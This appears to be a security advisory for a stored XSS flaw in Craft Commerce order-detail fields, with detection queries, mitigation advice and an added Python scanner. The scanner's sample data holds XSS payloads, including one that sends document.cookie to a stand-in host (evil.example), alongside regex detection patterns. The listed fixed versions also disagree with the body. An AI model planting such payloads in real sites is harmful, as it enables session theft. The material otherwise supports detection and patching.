Platform
php
Component
craftcms/commerce
Fixed in
4.0.1
5.0.1
4.10.2
A stored cross-site scripting (XSS) vulnerability has been identified in Craft Commerce, specifically in the order details section. Values stored in fields such as the shipping method name, order reference or site name are not adequately escaped when the order details are rendered, so an attacker who can write to one of these fields can plant JavaScript there. When a user views the order details, the injected script executes in that user's browser, potentially leading to session hijacking or defacement.
The primary impact is that an attacker can execute arbitrary JavaScript in the context of a victim's browser session. This could be leveraged to steal session cookies, redirect users to malicious websites, or modify the content displayed on the page. Successful exploitation could compromise user accounts and potentially lead to further attacks on the underlying system. The attack vector is the order details themselves, so the attacker can target exactly the users who review orders on the commerce platform. The practical exposure depends on who can write to the affected fields: in a default installation, shipping methods and site names are configured by control-panel users, so check which accounts hold those permissions.
This vulnerability was publicly disclosed on 2026-03-10. No public proof-of-concept (PoC) code has been released at the time of writing, but the ease of reproduction suggests a moderate risk of exploitation. It is not currently listed on CISA KEV. The CVSS score of 2.5 indicates low severity, but the potential for user compromise warrants prompt remediation.
Organizations running Craft Commerce 4.9.4 or earlier are at risk, as are 5.x installations earlier than 5.5.3, the 5.x release the vendor remediation guidance below points to. This includes businesses relying on Craft Commerce for e-commerce functionality, particularly those with custom shipping methods or custom order reference formats. Shared hosting environments where multiple users share the same Craft Commerce installation are also at increased risk, because more accounts can write to the affected fields.
• php: Examine the Craft Commerce database for script content in the shipping method name, order reference and site name fields. A first pass is SELECT id, name FROM commerce_shippingmethods WHERE name LIKE '%<script%'; (add your Craft table prefix, e.g. craft_, if one is configured; on PostgreSQL use ILIKE, since LIKE is case-sensitive there), with equivalent queries against commerce_orders.reference and sites.name. A '<script' match only catches the laziest payload: also look for any '<' in these plain-text fields, on*= event handlers, and javascript: URLs.
• generic web: Monitor access logs for requests carrying JavaScript payloads in parameters related to order details. Because the payload of a stored XSS is normally submitted in a POST body, which standard access logs do not record, treat this as a supplementary signal and rely primarily on the database check above.
• generic web: Review custom templates and plugins that render order data. In Twig, a |raw filter or an autoescape false block around the shipping method name, order reference or site name disables the escaping that prevents this class of bug; grep -rnE 'raw|autoescape' /path/to/craft/templates is a starting point for finding such spots.
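The following is an added example, not code from Craft CMS or from the advisory, that turns the first detection note into a scan a practitioner can run over rows exported from the database. The sample rows are constructed for the example; the table and column names (commerce_shippingmethods.name, commerce_orders.reference, sites.name) are assumed to match the Craft Commerce schema and should be checked against your installation. It also shows why the single LIKE '%<script%' query is not enough, and what a correctly escaped rendering of a flagged value looks like.

```python
"""Scan Craft Commerce order-detail fields for stored XSS indicators.

Added example (not vendor code). SAMPLE_ROWS stands in for the result of
queries such as
    SELECT id, name      FROM commerce_shippingmethods;
    SELECT id, reference FROM commerce_orders;
    SELECT id, name      FROM sites;
(assumed schema; prefix the table names with your Craft table prefix if one is set).
"""
import html
import re

# (table, column) -> [(row id, stored value), ...]   constructed sample data
SAMPLE_ROWS = {
    ("commerce_shippingmethods", "name"): [
        (1, "Standard Ground"),
        (2, "Express <script>document.location='https://evil.example/?c='+document.cookie</script>"),
        (3, "Pickup <img src=x onerror=alert(1)>"),
    ],
    ("commerce_orders", "reference"): [
        (10, "ORD-2026-0001"),
        (11, "ORD-<svg/onload=alert(document.domain)>"),
        (12, "&lt;script&gt;already entity-encoded, renders as text&lt;/script&gt;"),
    ],
    ("sites", "name"): [
        (1, "My Store"),
        (2, '<a href="javascript:alert(1)">Store</a>'),
    ],
}

# Indicators a reviewer would look for in a field that should be plain text.
# Every pattern requires a literal '<', so entity-encoded text is not flagged.
XSS_PATTERNS = [
    ("script_tag",     re.compile(r"<\s*script\b", re.I)),
    ("event_handler",  re.compile(r"<[^>]*\bon[a-z]+\s*=", re.I)),      # onerror=, onload=, ...
    ("javascript_uri", re.compile(r"<[^>]*\bjavascript\s*:", re.I)),
    ("active_element", re.compile(r"<\s*(svg|img|iframe|object|embed|math)\b", re.I)),
    ("any_tag",        re.compile(r"<\s*[a-z!/]", re.I)),               # any markup at all
]


def classify(value):
    """Names of all indicators present in one stored value (empty list = clean)."""
    return [name for name, pat in XSS_PATTERNS if pat.search(value)]


def naive_like_script(value):
    """Python equivalent of WHERE name LIKE '%<script%' under a case-insensitive
    collation (MySQL default). PostgreSQL LIKE is case-sensitive; use ILIKE there."""
    return "<script" in value.lower()


def scan(rows=SAMPLE_ROWS):
    """Return one finding per row that carries at least one indicator."""
    findings = []
    for (table, column), entries in rows.items():
        for row_id, value in entries:
            hits = classify(value)
            if hits:
                findings.append({"table": table, "column": column, "id": row_id,
                                 "indicators": hits, "value": value})
    return findings


def missed_by_naive_like(rows=SAMPLE_ROWS):
    """How many findings the LIKE '%<script%' query alone would not surface."""
    return sum(1 for f in scan(rows) if not naive_like_script(f["value"]))


def safe_render(value):
    """What correct output escaping (Twig autoescape, no |raw) turns the value into:
    the browser displays the payload as text instead of executing it."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for f in scan():
        print(f"{f['table']}.{f['column']} id={f['id']}: {', '.join(f['indicators'])}")
        print("   stored :", f["value"])
        print("   escaped:", safe_render(f["value"]))
    print(f"\n{missed_by_naive_like()} of {len(scan())} findings would be missed by LIKE '%<script%'")
```

Run it against a real export by replacing SAMPLE_ROWS with the query results; the escaped column shows what the fixed rendering should produce, so the same script doubles as a check that a flagged value is no longer live after patching.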
disclosure
Exploit status
EPSS
0.01% (1st percentile)
CISA SSVC
The recommended mitigation is to upgrade Craft Commerce to version 4.10.2 or later on the 4.x branch, or 5.5.3 or later on the 5.x branch, which include the fix for this vulnerability. If upgrading immediately is not feasible, treat output encoding as the real control: confirm that the templates rendering the shipping method name, order reference and site name escape their output (Twig's default autoescaping, with no |raw filter), and restrict which accounts may edit those fields. Input validation on the fields reduces exposure but is not a substitute, because a stored XSS is a failure to escape on output, not a failure to validate on input. Web application firewalls (WAFs) configured to detect and block XSS payloads add a further layer of protection, but encoded or obfuscated payloads routinely get past them. Regularly review and update your Craft Commerce installation to ensure you are running the latest security patches.
Update Craft Commerce to version 4.10.2 or later, or to version 5.5.3 or later, whichever applies to your current version. This resolves the stored XSS vulnerability in the order details.
CVE-2026-29177 is a stored cross-site scripting (XSS) vulnerability in Craft Commerce 4.x up to and including 4.9.4 (and, per the vendor fix versions, 5.x before 5.5.3), allowing malicious JavaScript to be injected via order details fields.
Yes, if you are using Craft Commerce 4.9.4 or earlier, or a 5.x release before 5.5.3, you are potentially affected by this XSS vulnerability.
Upgrade Craft Commerce to 4.10.2 or later (5.5.3 or later on the 5.x branch) to resolve this vulnerability. As a temporary workaround, make sure the affected fields are escaped when rendered and limit who can edit them.
While no active exploitation has been confirmed, the ease of reproduction suggests a potential risk.
Refer to the official Craft CMS security advisory for detailed information and updates: [https://craftcms.com/security/](https://craftcms.com/security/)